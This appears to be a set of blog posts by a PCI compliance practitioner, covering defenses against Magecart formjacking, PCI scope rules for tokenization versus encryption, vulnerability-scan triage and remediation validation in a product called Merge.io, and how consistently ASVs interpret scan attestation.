The recent breaches at Ticketmaster, British Airways and Newegg that have been attributed to the hacking group Magecart have many e-commerce merchants taking a closer look at any potential exposure. And rightfully so.

Several blogs have well documented the details of the credit card compromise. However, there is still a lack of detail surrounding how the attackers are obtaining access to the environments modify the static JavaScript files. Clearly a huge area of missing information. In each reported case, it seems that the attackers would have obtained access to the file systems where the files were hosted, or some portion of the development and deployment pipeline in order to modify these files.

The inserted code that provided the compromise of credit card data leverages the logical structure of the Document Object Model (DOM) to be able to access and manipulate anything on the page. This includes the ability to send data to a malicious entity behind the scenes of a normally operating payment page as in the case of these Magecart breaches. This is also known as formjacking. With access to the DOM, many common security measures are effectively bypassed. This includes the embedding of iFrames and even the implementation of browser-based encryption in order to better secure payment data upon collection from the customer.

Once the attackers gain access to the source code they own any data that you are collecting from the user.

To make things more difficult, today’s common web pages are loading dozens of scripts from many different locations. This includes scripts loaded from internal systems as well as from third party providers. Any one of these scripts has the ability to manipulate data elements that are being collected from the customer.

I believe that this type of attack will continue to grow due to the number of possible vectors of infection a given page and the value of the customer data that is at risk. I also believe that this will eventually drive changes with the PCI council’s approach to e-commerce guidelines and requirements. Hopefully providing more emphasis on server-based controls and a much needed focus on securing the source code and development pipeline.

What can we do to help reduce the risk of these types of attacks?

Secure the source code pipeline: So much of our technology world these days is powered by code, this includes infrastructure changes, automation and of course our applications. The entire code pipeline should be a focus for security controls to ensure the integrity of the code from source, to build to deployment. Consider implementing hashing checks throughout this process and alerting when hashes do not match. This provides a mechanism to ensure that what was developed at least makes it to the intended destination

Secure the origin servers: Once our servers get the validated source code we should have a way to periodically check the code that is running to ensure that it hasn’t changed. This can be accomplished through various scripting methods, automation tools or open source tools such as OSQuery.

Implement Subresource Integrity checks: The use of Content Security Policies in conjunction with Subresource Integrity can ensure that files that your pages fetch from anywhere (third party, CDN or internally) have been delivered without any changes. This is accomplished by delivering signatures of the known-good scripts that the browser verifies prior to execution. Once again it is important to note that if the attacker has access to the origin source code – all of this behavior can be modified.
The added measures of knowing that the code you authored is what is running on your servers and having visibility when that changes can help to reduce the risk of these type of attacks for your organization. Leverage automation as much as possible to ensure these measures don’t have a negative impact on the efficiencies of deploying often.

Many organizations seek ways to reduce the scope for PCI DSS. While there are many different methods of reducing scope, I want to focus specifically on tokenization and encryption of the primary account number (PAN).

For the intent of this post we will assume that the encryption and tokenization methods that are used meet the appropriate requirements to protect the PAN and that unauthorized attempts to reverse the token or encrypted value would be computationally infeasible. Additionally, I want to note that this post is not arguing the technical strengths or differences between tokenization and encryption, just to point out the council’s documented view on PCI DSS scope as it relates to the key and vault management aspect of these technologies.

Definitions

From the PCI Security Standards Glossary of Terms: Encryption is the process of converting information into an unintelligible form except to holders of a specific cryptographic key.

From the PCI DSS Tokenization Guidelines information supplement, tokenization is defined as a process by which the primary account number (PAN) is replaced with a surrogate value called a token. De-tokenization is the reverse process of redeeming a token for its associated PAN value.

For both tokenization and encryption, the overall principal is that a valuable data is altered into non-valuable data through a given mechanism. For encryption, that mechanism is the encryption process and the keys. For tokenization, the mechanism is the tokenization process and the relationship between the token and PAN. Additionally, the process of de-tokenization and decryption are similar in that there is a process to provide my encrypted data or tokenized data to a mechanism in order to receive the PAN in return.

The tokenization guidance that is provided in the PCI DSS Tokenization Guidelines August 2011 notes that tokenization can be used as a method of reducing the scope of PCI in an organization. There are obviously many considerations for de-scoping using tokenization that are adequately covered in this document. But it is important to note that the document does not seem to link de-scoping with who manages the tokenization process, vault or tables.

The topic of de-scoping using encryption is covered by the PCI DSS FAQ article 2086 where it is noted that scope reduction can be achieved only if the merchant or service provider does not have access to the encryption keys.

If we follow this logic through to its conclusion, the council seems to be saying that tokenization can be used as a method for scope reduction without restriction to who manages the tokenization mechanism, but encryption can only be used if the merchant or service provider has no access to the keying mechanism.

Here we have nearly identical fundamental approaches to protecting data. Each deals with nonsensical data that can be exchanged for valid data through a particular mechanism. Depending on the details of the architecture, each has the capability of adequately securing cardholder data. However, it seems that the council has added additional rules around scope reduction using encryption vs. tokenization.

First of all, I do not believe that the council should be able to dictate the ability to de-scope based on a potential management issue. It is feasible to architect an effective key management while keeping clear segregation of duties within the same organization or entity. I do not think it should be the council’s place to prohibit a solution based upon the predetermination that an organization cannot maintain effective segregation of duties or other risk mitigation strategies. An enterprise encryption strategy isn’t acquired as an off-the shelf widget that I just plug in and turn on. There are many different potential elements that can make up a solution (one-time use, long term storage, tokenization hybrid, etc). It should be left up to the QSA to determine if the implemented solution meets the intent of the requirements.

But more importantly for the purposes of this discussion is the inconsistency of the view of two nearly identical fundamental approaches to protecting sensitive data and the accompanying keying systems. Why is the council’s position on these two scenarios different? I hope that the council will address this ambiguity in upcoming FAQ’s or supplemental documentation as the current information that is available is contradictory in nature.

Converting mounds of vulnerability scan data into operational action is a challenge that many organizations have. One major part of that challenge is how to go about systematically boiling down the volumes of vulnerability data to get to the vulnerabilities that you need to fix.

This is especially crucial when dealing with internal scans of larger networks. Internal vulnerability scanning tends to be a tricky process due to the fact that in most cases there is very little access control that is implemented between the scan engine and the target systems. With little access control in place, the vulnerability scanners produce a lot of vulnerability data to analyze. The question still remains – how do you make the most sense of the volumes of data that is generated?

We begin with a policy and a process. Does you have established remediation thresholds for ranked vulnerabilities and has management signed off on it? If not, start your journey here. Build an organizational policy that establishes a base set of conditions that determine which vulnerabilities must be remediated vs. vulnerabilities that are acceptable in a given environment. As an example policy/process may state that you remediate (per the defined remediation thresholds) any vulnerability that meet the following criteria for internal scans:

CVSS score of 5.5 or greater

SQL injection

Cross site scripting

Since these are internal scans, there will be certain vulnerabilities that we will choose not to remediate. This could be due to environmental variables, compensating controls, etc. Examples of these may include:

Self signed certificates

Denial of service vulnerabilities

These are obviously just examples, but each organization generally has vulnerabilities they want to remediate and vulnerabilities that they don’t due to acceptable levels of risk. So how do you apply this logic in an automated fashion to our vulnerability data? The reality is that most companies that I deal with are still using Excel (the duct tape and bailing wire of the business world) to accomplish this. And even with the use of spreadsheets, the process is highly manual.

This is where Merge.io can help out. With Merge.io you can create custom risk profiles that can determine which vulnerabilities from the imported data sets to remediate and which to exclude for acceptance. Just create the profile using the risk profile builder and apply it to a scan import. All of the vulnerabilities that match your include criteria will be added to the Merge.io workflow system. And the vulnerabilities that match the exclude filter will be excluded from workflow tracking.

Risk profile filters can be built that examine vulnerability CVSS score, Risk rating, title description, port, service, operating system and more.

These filters are available for use with any scan imported into Merge.io. They can be built to match your internal remediation standards and they can be added to over time as the organization changes. This provides an automated, repeatable approach to managing the volume of data that vulnerability scans can create.

Merge.io has a built-in filter for PCI that matches the requirements laid out by the PCI ASV Program Guide Version 2.0. Additional compliance filters are coming soon!

PCI requirement 11.2 requires merchants and service providers to conduct internal and external vulnerability scanning on their infrastructures. The requirements further state that the scanning activities should be repeated until clean scans are achieved.

The devil is indeed in the details when it comes to operationalizing what seems to be a simple concept. Companies struggle with how to effectively achieve clean-scans when they are scanning many different assets running on multiple platforms that have different patching cycles.

Many companies create manual file comparisons using spreadsheets to compare scan files quarter over quarter. This manual comparison process can be come exceedingly complex and time consuming.

In order to stop the vulnerability management “whack-a-mole” we have incorporated an automatic validations feature into the Merge.io platform. This validation process allows you automatically compare scan data against closed vulnerabilities to prove that the vulnerabilities have been remediated on the target systems.

Once a project is created and baseline scan data has been imported, the Merge.io platform provides a mechanism to allow continuous validation scan data to be imported into that project. For each validation scan file that is imported, Merge.io analyzes the data in the scan file, specifically looking for vulnerabilities that are in the “Closed-Approved” state on the Merge.io platform. If the vulnerability is not present in the validation scan file, then Merge.io marks the vulnerability as “Validated” noting the uploaded scan file that it compared. If the vulnerability still persists in the validation scan file, then Merge.io re-opens the vulnerability and assigns it back to the engineer who closed the vulnerability.

This closed-loop approach to vulnerability lifecycle management allows organizations to not only track the vulnerability state all the way through the vulnerability management process. But have assurance that each vulnerability has been proven not to persist.

Merge.io will be ready soon – feel free to contact us at info@merge.io for more information. Or sign up to be notified when it is released.

With the introduction of the ASV changes on September 1, 2010 ASV’s were to begin providing merchants with an Attestation of scan Compliance. The details of the attestation are documented in the ASV Program Guide v1.0, which was released in March of 2010.

The introduction of the attestation was intended to bring a reduction in errors with a more formal process of engagement between the merchant and ASV.

But exactly what is the ASV attesting to?
The ASV Program Guide version 1.2 requires that the ASV provide the merchant or service provider an Attestation of Scan Compliance attesting that the scan results meet PCI DSS Requirement 11.2 and the PCI DSS ASV Program Guide.

That’s not how I read it…
There seems to be some inconsistencies amongst ASV’s as to what exactly they are attesting to as a part of the required ASV Attestation of Scan Compliance. In working with different ASV’s over the past years I have come across three different methodologies on what an ASV is attesting to:

There should be NO vulnerabilities on a given host at the time of attestation

All identified vulnerabilities have been addressed within 30 days of when they were identified

All identified vulnerabilities must have been addressed within 90 days of when they were identified

As an example, Qualys (who supplies their scan tool to a large portion of the ASV industry) has implemented a rule within their platform that fails a given host if that host has not been scanned within the last thirty days. This helps them to support their methodology of attestations – vulnerabilities should be addressed within 30 days of when they were identified.

The differences in these methodologies have a huge impact on organizations with a large ASV scanning scope. It is very difficult for an organization of size, running many different operating systems with different patch/release/test cycles to achieve an attestation under these types of attestation requirements.

This is not necessarily an issue with patch timing, it’s an issue with the alignment of different patch cycles and how that is reflected on a particular scan. Let’s take an example – an ASV scan scope of 100 system components contains the following platforms:

Microsoft Windows

Redhat Linux

Cisco IOS

Juniper OS

HPUX

F5 Networks

This is a very plausible group of devices for an average enterprise. This group has 6 different platforms with 6 different patching release cycles. In order to meet the Qualys attestation requirements this pool of 100 system components would have to be scanned every 30 days and reflect a “clean scan” with overlapping patch cycles somewhere within a quarterly cycle.

This approach also presents some inconsistencies with the requirements of DSS Requirement 6.1, which as an example, allows a risk based approach to prioritize less critical security patches for implementation beyond 30 days.

Where’s the sweet spot?
The ASV scanning element of the PCI requirements should be a validation that the merchant or service provider has a working program in place for patch and configuration management by providing proof that vulnerabilities are being addressed in accordance with PCI DSS 6.1 and 11.2. While the stricter attestation requirements by some ASV’s provide a reduction in risk for the ASV, it can also provide operational hurdles for larger organizations.

At this point in time, PCI DSS 11.2 provides no further clarification other than clean scans are required on a quarterly basis. If the merchant can prove to the ASV that vulnerabilities that were identified have been resolved within a 90-day period, I believe that this meets what is currently documented in 11.2.

Establishing the time that vulnerabilities must be remediated by should be based on risk to the organization while meeting the minimum guides of compliance requirements. It should be up to the merchant or service provider to establish these time frames according to their business risk. Unfortunately in some circumstances, this timing is being established based on risk to the ASV and what they will attest to, not risk to the merchant and their operating environment.

Hopefully the highly anticipated next version of the PCI Program Guide will bring some much needed clarification in this space.